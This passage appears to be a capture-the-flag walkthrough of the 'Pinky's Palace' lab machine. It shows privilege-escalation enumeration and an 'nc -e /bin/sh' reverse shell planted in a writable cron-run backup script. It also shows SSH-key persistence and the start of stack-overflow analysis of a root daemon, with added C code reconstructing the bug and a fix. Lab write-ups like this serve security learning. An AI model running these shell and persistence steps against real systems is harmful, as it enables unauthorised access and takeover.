/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/mount
/bin/umount
/bin/ping

# Check for frequently running processes
$ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;

pinky@Pinkys-Palace:/$ ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root
ls: cannot open directory '/root': Permission denied
/tmp:
.   .font-unix  systemd-private-b2b205f6d25d4b4eab4f4d46936996c3-apache2.service-ab0Nbk            .Test-unix  .XIM-unix
..  .ICE-unix   systemd-private-b2b205f6d25d4b4eab4f4d46936996c3-systemd-timesyncd.service-t8NO6G  .X11-unix

/var/backups:
.  ..  apt.extended_states.0  apt.extended_states.1.gz  apt.extended_states.2.gz

/var/mail/:
.  ..

/var/spool/mail/:
.  ..

/var/tmp:
.                                                                                  systemd-private-6b6650cce3004c3a88a3ee2f01e9b905-apache2.service-pKdoMx
..                                                                                 systemd-private-6b6650cce3004c3a88a3ee2f01e9b905-systemd-timesyncd.service-ZYxtKl
systemd-private-111e24c66f054200859d5b81c67004e2-apache2.service-SIDlJO            systemd-private-b2b205f6d25d4b4eab4f4d46936996c3-apache2.service-EzPs68
systemd-private-111e24c66f054200859d5b81c67004e2-systemd-timesyncd.service-XswiwR  systemd-private-b2b205f6d25d4b4eab4f4d46936996c3-systemd-timesyncd.service-47W9gv
systemd-private-566e8eddd2a64ec28a14ce4a1f7f3f27-apache2.service-CoyyTQ            systemd-private-cb424d60f9454a59941e2f0144725b2c-apache2.service-f88UiV
systemd-private-566e8eddd2a64ec28a14ce4a1f7f3f27-systemd-timesyncd.service-S11NGS  systemd-private-cb424d60f9454a59941e2f0144725b2c-systemd-timesyncd.service-upDzUm

# Writable files by each group I belong to
pinky@Pinkys-Palace:/$ for g in `groups`;
>       do printf "  Group $g:\n";
>       find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
>       done
  Group pinky:
/usr/local/bin/backup.sh
  Group cdrom:
  Group floppy:
  Group audio:
  Group dip:
  Group video:
  Group plugdev:
  Group netdev:

$ cat /usr/local/bin/backup.sh
#!/bin/bash

rm /home/demon/backups/backup.tar.gz
tar cvzf /home/demon/backups/backup.tar.gz /var/www/html
#
#
#

pinky@Pinkys-Palace:/$ ls -al /usr/local/bin/backup.sh
-rwxrwx--- 1 demon pinky 113 Mar 17  2018 /usr/local/bin/backup.sh

I’m not sure if anything is actually executing this script… but I changed it to:

#!/bin/bash
nc -e /bin/sh 192.168.2.23 4444
#rm /home/demon/backups/backup.tar.gz
#tar cvzf /home/demon/backups/backup.tar.gz /var/www/html
#
#
#

And left a listener running… a few seconds later:

$ nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.2.23] from pinkydb [192.168.2.24] 39388
id
uid=1001(demon) gid=1001(demon) groups=1001(demon)
python -c 'import pty; pty.spawn("/bin/bash")'
demon@Pinkys-Palace:~$ ls -al
ls -al
total 24
drwxr-x--- 3 demon demon 4096 Mar 17  2018 .
drwxr-xr-x 5 root  root  4096 Mar 17  2018 ..
drwxr-xr-x 2 demon demon 4096 Mar  1 16:30 backups
lrwxrwxrwx 1 root  root     9 Mar 17  2018 .bash_history -> /dev/null
-rw-r--r-- 1 demon demon  220 May 15  2017 .bash_logout
-rw-r--r-- 1 demon demon 3526 May 15  2017 .bashrc
lrwxrwxrwx 1 root  root     9 Mar 17  2018 .mysql_history -> /dev/null
-rw-r--r-- 1 demon demon  675 May 15  2017 .profile
demon@Pinkys-Palace:~$ pwd
pwd
/home/demon
demon@Pinkys-Palace:~$ mkdir .ssh
mkdir .ssh
demon@Pinkys-Palace:~$ echo "ssh-rsa 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 [email protected]" > .ssh/authorized_keys

$ ssh [email protected] -p 4655
Linux Pinkys-Palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
demon@Pinkys-Palace:~$ id
uid=1001(demon) gid=1001(demon) groups=1001(demon)

demon@Pinkys-Palace:~$ ls -al
total 28
drwxr-x--- 4 demon demon 4096 Mar  1 16:36 .
drwxr-xr-x 5 root  root  4096 Mar 17  2018 ..
drwxr-xr-x 3 demon demon 4096 Mar  1 16:37 backups
lrwxrwxrwx 1 root  root     9 Mar 17  2018 .bash_history -> /dev/null
-rw-r--r-- 1 demon demon  220 May 15  2017 .bash_logout
-rw-r--r-- 1 demon demon 3526 May 15  2017 .bashrc
lrwxrwxrwx 1 root  root     9 Mar 17  2018 .mysql_history -> /dev/null
-rw-r--r-- 1 demon demon  675 May 15  2017 .profile
drwxr-xr-x 2 demon demon 4096 Mar  1 16:36 .ssh

demon@Pinkys-Palace:~$ env
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=192.168.2.23 40708 192.168.2.24 4655
LANG=en_US.UTF-8
XDG_SESSION_ID=64
USER=demon
PWD=/home/demon
HOME=/home/demon
SSH_CLIENT=192.168.2.23 40708 4655
SSH_TTY=/dev/pts/1
MAIL=/var/mail/demon
TERM=xterm-256color
SHELL=/bin/bash
SHLVL=1
LOGNAME=demon
XDG_RUNTIME_DIR=/run/user/1001
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
_=/usr/bin/env
OLDPWD=/

demon@Pinkys-Palace:/$ find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
/dev/mqueue
/dev/shm
/tmp
/tmp/.ICE-unix
/tmp/.font-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/daemon
/daemon/panel
/var/tmp
/var/www/html/apache/wp-config.php
/var/lib/php/sessions
/home/demon
/usr/local/bin/backup.sh
/run/user/1001
/run/user/1001/gnupg
/run/user/1001/systemd
/run/user/1001/systemd/transient
/run/lock

$ cd /daemon
$ ./panel
...
[-] binding to socket
[-] binding to socket
[-] binding to socket
[-] binding to socket
[-] binding to socket
[-] binding to socket
...


strings panel
/lib64/ld-linux-x86-64.so.2
d.jb
libc.so.6
socket
strcpy
exit
htons
wait
fork
listen
printf
strlen
send
memset
bind
recv
setsockopt
close
accept
__libc_start_main
__gmon_start__
GLIBC_2.2.5
AWAVA
AUATL
[]A\A]A^A_
[-] %s
[-] Fail in socket
setting sock options
binding to socket
listening
new sock failed
[+] Welcome to The Daemon [+]
This is soon to be our backdoor
into Pinky's Palace.
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6972
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
panel.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
_edata
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
handlecmd
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
[email protected]@GLIBC_2.2.5
__bss_start
main
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
__TMC_END__
fatal
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment

Oh hmm… this looks like it may be that backdoor thing on 31337 that I ended up ignoring, probably don’t need this vector anymore eh?

demon@Pinkys-Palace:/daemon$ ps -aux | grep daemon
message+    448  0.0  0.1  45116  3808 ?        Ss   12:46   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root        468  0.0  0.0   4040   988 ?        Ss   12:46   0:00 /daemon/panel
root        504  0.0  0.0 159504  1680 ?        Ss   12:46   0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
root        972  0.0  0.0   4040    84 ?        S    13:53   0:00 /daemon/panel
demon     43334  0.0  0.0  12784   996 pts/1    S+   17:46   0:00 grep daemon

Yeah no, I need to figure out how to pop a shell with that god damn binary. I hate binary analysis honestly. Ohhhh well, here we go!

# Download a copy onto my host
demon@Pinkys-Palace:/daemon$ pwd
/daemon
demon@Pinkys-Palace:/daemon$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.2.23 - - [01/Mar/2021 17:49:38] "GET /panel HTTP/1.1" 200 -

$ wget 192.168.2.24:8000/panel 
--2021-03-01 20:49:56--  http://192.168.2.24:8000/panel
Connecting to 192.168.2.24:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13280 (13K) [application/octet-stream]
Saving to: ‘panel’

panel                                         100%[===============================================================================================>]  12.97K  --.-KB/s    in 0s      

2021-03-01 20:49:56 (180 MB/s) - ‘panel’ saved [13280/13280]

$ chmod +x panel && ./panel
... hangs ...

# Check if we can overflow the stack easily
$ readelf -a ./panel | grep -i -A3 stack 
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RWE    0x10
  GNU_RELRO      0x0000000000001e08 0x0000000000601e08 0x0000000000601e08
                 0x00000000000001f8 0x00000000000001f8  R      0x1
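The readelf grep above is reading one field: the p_flags of the PT_GNU_STACK program header, which the loader uses to decide whether the stack is mapped executable ("RWE" means it is). The same check done programmatically, as an added example that is not part of the original write-up: it parses the ELF64 header and program headers with the definitions glibc ships in <elf.h>, and, so that it runs without the panel binary, constructs a minimal ELF image in memory carrying the flags under test. The function and enum names are mine.

```c
/* Added example (not from the write-up): the readelf GNU_STACK check done by
 * hand. Parses the ELF64 header and program headers using glibc's <elf.h>
 * definitions and reports the PT_GNU_STACK flags. Byte order is assumed to be
 * the host's (fine for x86-64 binaries inspected on x86-64). */
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { STACK_OK = 0, STACK_EXEC = 1, STACK_NOT_FOUND = 2, STACK_BAD_ELF = -1 };

/* STACK_EXEC if PT_GNU_STACK carries PF_X (readelf's "RWE"), STACK_NOT_FOUND
 * if the header is absent (older toolchains; the loader then falls back to an
 * executable stack, so treat it as a finding too), STACK_OK otherwise. */
int elf64_stack_status(const unsigned char *img, size_t len) {
    if (len < sizeof(Elf64_Ehdr)) return STACK_BAD_ELF;
    Elf64_Ehdr eh;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64)
        return STACK_BAD_ELF;
    if (eh.e_phentsize != sizeof(Elf64_Phdr)) return STACK_BAD_ELF;
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        uint64_t off = eh.e_phoff + (uint64_t)i * eh.e_phentsize;
        if (off + sizeof(Elf64_Phdr) > len) return STACK_BAD_ELF;
        Elf64_Phdr ph;
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type == PT_GNU_STACK)
            return (ph.p_flags & PF_X) ? STACK_EXEC : STACK_OK;
    }
    return STACK_NOT_FOUND;
}

/* Same check on a file on disk. Program headers sit right after the ELF
 * header in normal executables, so the first 64 KiB is enough. */
int elf64_stack_status_file(const char *path) {
    static unsigned char buf[1 << 16];
    FILE *f = fopen(path, "rb");
    if (!f) return STACK_BAD_ELF;
    size_t n = fread(buf, 1, sizeof buf, f);
    fclose(f);
    return elf64_stack_status(buf, n);
}

/* Constructed test image: an ELF64 header followed by a single PT_GNU_STACK
 * program header with the requested flags. Not loadable, just parseable. */
size_t build_test_elf(unsigned char *buf, size_t cap, uint32_t stack_flags) {
    Elf64_Ehdr eh;
    Elf64_Phdr ph;
    if (cap < sizeof eh + sizeof ph) return 0;
    memset(&eh, 0, sizeof eh);
    memset(&ph, 0, sizeof ph);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS64;
    eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type = ET_EXEC;
    eh.e_machine = EM_X86_64;
    eh.e_version = EV_CURRENT;
    eh.e_ehsize = sizeof eh;
    eh.e_phoff = sizeof eh;
    eh.e_phentsize = sizeof ph;
    eh.e_phnum = 1;
    ph.p_type = PT_GNU_STACK;
    ph.p_flags = stack_flags;
    ph.p_align = 0x10;
    memcpy(buf, &eh, sizeof eh);
    memcpy(buf + sizeof eh, &ph, sizeof ph);
    return sizeof eh + sizeof ph;
}

/* Status of a constructed image with the given PT_GNU_STACK flags. */
int status_for_flags(uint32_t flags) {
    unsigned char buf[256];
    size_t n = build_test_elf(buf, sizeof buf, flags);
    return elf64_stack_status(buf, n);
}

int main(int argc, char **argv) {
    if (argc > 1) {
        printf("%s: stack status %d\n", argv[1], elf64_stack_status_file(argv[1]));
        return 0;
    }
    printf("RWE stack (as on panel): %d\n", status_for_flags(PF_R | PF_W | PF_X));
    printf("RW stack  (hardened):    %d\n", status_for_flags(PF_R | PF_W));
    return 0;
}
```

Run with a path to check a real binary (`./a.out ./panel`), or with no arguments to see both constructed cases. On the defensive side the flag is decided at link time: a binary comes out with RWE when it was linked with `-z execstack` or when an object in the link lacked the `.note.GNU-stack` section, and `-z noexecstack` (the default for code compiled by gcc) clears it.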

# We can...
# Let's find the code handling the command that we saw just echo back at us before
$ readelf -a ./panel | grep FUNC        
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     5: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    10: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    12: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    13: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    14: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    15: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    16: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    17: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    18: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    29: 0000000000400870     0 FUNC    LOCAL  DEFAULT   13 deregister_tm_clones
    30: 00000000004008b0     0 FUNC    LOCAL  DEFAULT   13 register_tm_clones
    31: 00000000004008f0     0 FUNC    LOCAL  DEFAULT   13 __do_global_dtors_aux
    34: 0000000000400910     0 FUNC    LOCAL  DEFAULT   13 frame_dummy
    46: 0000000000400c00     2 FUNC    GLOBAL DEFAULT   13 __libc_csu_fini
    47: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    49: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    50: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIB[...]
    52: 0000000000400c04     0 FUNC    GLOBAL DEFAULT   14 _fini
    53: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    54: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    55: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    56: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    57: 0000000000400964    71 FUNC    GLOBAL DEFAULT   13 handlecmd
    58: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    59: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    60: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_mai[...]
    65: 0000000000400b90   101 FUNC    GLOBAL DEFAULT   13 __libc_csu_init
    66: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    68: 0000000000400840    43 FUNC    GLOBAL DEFAULT   13 _start
    70: 00000000004009ab   473 FUNC    GLOBAL DEFAULT   13 main
    71: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    72: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    73: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    75: 0000000000400936    46 FUNC    GLOBAL DEFAULT   13 fatal
    76: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    77: 0000000000400718     0 FUNC    GLOBAL DEFAULT   11 _init
    78: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
    79: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@@GLIBC_2.2.5
# If I were a betting man, I'd say handlecmd is what we're going to care about... Let's disassemble it
$ gdb ./panel
GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./panel...
(No debugging symbols found in ./panel)
(gdb) disassemble handlecmd
Dump of assembler code for function handlecmd:
   0x0000000000400964 <+0>:	push   %rbp
   0x0000000000400965 <+1>:	mov    %rsp,%rbp
   0x0000000000400968 <+4>:	add    $0xffffffffffffff80,%rsp
   0x000000000040096c <+8>:	mov    %rdi,-0x78(%rbp)
   0x0000000000400970 <+12>:	mov    %esi,-0x7c(%rbp)
   0x0000000000400973 <+15>:	mov    -0x78(%rbp),%rdx
   0x0000000000400977 <+19>:	lea    -0x70(%rbp),%rax
   0x000000000040097b <+23>:	mov    %rdx,%rsi
   0x000000000040097e <+26>:	mov    %rax,%rdi
   0x0000000000400981 <+29>:	call   0x400750 <strcpy@plt>
   0x0000000000400986 <+34>:	lea    -0x70(%rbp),%rax
   0x000000000040098a <+38>:	mov    %rax,%rdi
   0x000000000040098d <+41>:	call   0x400770 <strlen@plt>
   0x0000000000400992 <+46>:	mov    %rax,%rdx
   0x0000000000400995 <+49>:	lea    -0x70(%rbp),%rsi
   0x0000000000400999 <+53>:	mov    -0x7c(%rbp),%eax
   0x000000000040099c <+56>:	mov    $0x0,%ecx
   0x00000000004009a1 <+61>:	mov    %eax,%edi
   0x00000000004009a3 <+63>:	call   0x400790 <send@plt>
   0x00000000004009a8 <+68>:	nop
   0x00000000004009a9 <+69>:	leave  
   0x00000000004009aa <+70>:	ret

We can see strcpy and all that: the three calls are strcpy, then a length call whose result is handed to the next call as its size (read here as strlen; the symbol name did not survive the listing), then send. So handlecmd copies the command (rdi) into a 0x70-byte, i.e. 112-byte, stack buffer at rbp-0x70 with no length check and echoes it back on the client socket (esi). Anything past 112 bytes overwrites the saved rbp, and bytes 120 onward overwrite the saved return address: this is highly likely a simple stack overflow, and since the binary is not PIE (everything sits at 0x400000-based addresses) its code addresses are fixed on the target. Again, I hate this process, there must be an easier way to go about this…
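
To make the bug concrete, here is a C reconstruction of what that disassembly does, next to a bounded version. This is an added illustration, not the daemon's source (which is not available) and not code from this walkthrough: the 0x70-byte buffer and the strcpy/strlen/send sequence are taken from the listing, the signature handlecmd(cmd, fd) is assumed from the register usage (rdi, esi), and the socketpair driver is only a stand-in for the daemon's client socket.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define CMDBUF_SIZE 0x70   /* lea -0x70(%rbp),%rax: a 112-byte stack buffer */

/* Assumed reconstruction of the vulnerable handler: rdi = command string,
 * esi = client socket. strcpy has no length check, so a command longer than
 * 111 bytes runs past buf into the saved rbp (buf+112) and the saved return
 * address (buf+120). Never call this with untrusted input. */
ssize_t handlecmd_vuln(const char *cmd, int fd)
{
    char buf[CMDBUF_SIZE];
    strcpy(buf, cmd);                      /* unbounded copy onto the stack */
    return send(fd, buf, strlen(buf), 0);  /* echo the command back */
}

/* Bounded version: never write more than sizeof(buf)-1 bytes plus the NUL. */
ssize_t handlecmd_fixed(const char *cmd, int fd)
{
    char buf[CMDBUF_SIZE];
    size_t n = 0;
    while (n < sizeof(buf) - 1 && cmd[n] != '\0')
        n++;
    memcpy(buf, cmd, n);
    buf[n] = '\0';
    return send(fd, buf, n, 0);
}

/* Frame layout implied by the prologue: buf at rbp-0x70, saved rbp at rbp,
 * return address at rbp+8. These are the offsets a pattern search should confirm. */
size_t saved_rbp_offset(void) { return CMDBUF_SIZE; }
size_t ret_addr_offset(void)  { return CMDBUF_SIZE + 8; }

/* Run the fixed handler over a socketpair (stand-in for the daemon's client
 * socket) and return how many bytes came back. */
ssize_t echo_via_fixed(const char *cmd, char *out, size_t outlen)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return -1;
    ssize_t sent = handlecmd_fixed(cmd, sv[0]);
    ssize_t got = sent <= 0 ? sent : recv(sv[1], out, outlen, 0);
    close(sv[0]);
    close(sv[1]);
    return got;
}

/* Echo an all-'A' command of input_len bytes through the fixed handler;
 * the return value shows where the bounded copy truncates. */
ssize_t fixed_echo_len_for(size_t input_len)
{
    char out[512];
    char *probe = malloc(input_len + 1);
    if (!probe)
        return -1;
    memset(probe, 'A', input_len);
    probe[input_len] = '\0';
    ssize_t got = echo_via_fixed(probe, out, sizeof out);
    free(probe);
    return got;
}

int main(void)
{
    printf("saved rbp at offset %zu, return address at offset %zu\n",
           saved_rbp_offset(), ret_addr_offset());
    printf("fixed handler echoes %zd of 300 bytes\n", fixed_echo_len_for(300));
    return 0;
}
```

The fix is deliberately the dull one: bound the copy to the buffer and keep the terminator. A 300-byte command comes back as 111 bytes instead of smashing the frame; the vulnerable variant is kept only so the two can be read side by side.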

I found this: https://github.com/longld/peda

I’ll give it a shot.

$ gdb ./panel
Reading symbols from ./panel...
(No debugging symbols found in ./panel)
gdb-peda$ start
[----------------------------------registers-----------------------------------]
RAX: 0x4009ab (<main>:	push   rbp)
RBX: 0x0 
RCX: 0x7ffff7fad718 --> 0x7ffff7fafb00 --> 0x0 
RDX: 0x7fffffffe108 --> 0x7fffffffe432 ("SSH_AUTH_SOCK=/tmp/ssh-oeWCWJtY5ucW/agent.847")
RSI: 0x7fffffffe0f8 --> 0x7fffffffe417 ("/home/kali/Downloads/panel")
RDI: 0x1 
RBP: 0x7fffffffe000 --> 0x400b90 (<__libc_csu_init>:	push   r15)
RSP: 0x7fffffffe000 --> 0x400b90 (<__libc_csu_init>:	push   r15)
RIP: 0x4009af (<main+4>:	sub    rsp,0x1050)
R8 : 0x0 
R9 : 0x7ffff7fe2180 (<_dl_fini>:	push   rbp)
R10: 0x8 
R11: 0x202 
R12: 0x400840 (<_start>:	xor    ebp,ebp)
R13: 0x0 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4009aa <handlecmd+70>:	ret    
   0x4009ab <main>:	push   rbp
   0x4009ac <main+1>:	mov    rbp,rsp
=> 0x4009af <main+4>:	sub    rsp,0x1050
   0x4009b6 <main+11>:	call   0x400820 <[...]@plt>
   0x4009bb <main+16>:	mov    DWORD PTR [rbp-0x4],eax
   0x4009be <main+19>:	cmp    DWORD PTR [rbp-0x4],0x0
   0x4009c2 <main+23>:	jne    0x400b75 <main+458>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe000 --> 0x400b90 (<__libc_csu_init>:	push   r15)
0008| 0x7fffffffe008 --> 0x7ffff7e15d0a (<__libc_start_main+234>:	mov    edi,eax)
0016| 0x7fffffffe010 --> 0x7fffffffe0f8 --> 0x7fffffffe417 ("/home/kali/Downloads/panel")
0024| 0x7fffffffe018 --> 0x1ffffe3f9 
0032| 0x7fffffffe020 --> 0x4009ab (<main>:	push   rbp)
0040| 0x7fffffffe028 --> 0x7ffff7e158e9 (<init_cacheinfo+569>:	mov    r8,rax)
0048| 0x7fffffffe030 --> 0x0 
0056| 0x7fffffffe038 --> 0x29ce7ed0c7935da9 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Temporary breakpoint 1, 0x00000000004009af in main ()
gdb-peda$ aslr
ASLR is OFF

Damn that’s pretty sweet actually, this at least makes it less painful.

One caveat on that "ASLR is OFF": it is gdb's setting for the process it launches (gdb disables randomisation by default) and says nothing about the target VM. What makes the approach below hold up anyway is that panel is not PIE, so its code, and any jmp/call gadget found in it, sits at the same 0x400000-based address on the target. The stack addresses printed in these dumps are not to be trusted there.

# Alright so, from the readme here I think this is the process we take
# Add a breakpoint at the ret of the function we're targeting. On x86_64 a smashed return address is
# usually non-canonical, so the process dies in the ret itself and RIP never shows the pattern;
# breaking on the ret lets us read the would-be RIP from [RSP] instead.
gdb-peda$ b *handlecmd+70
Breakpoint 2 at 0x4009aa
gdb-peda$ run
Starting program: /home/kali/Downloads/panel 
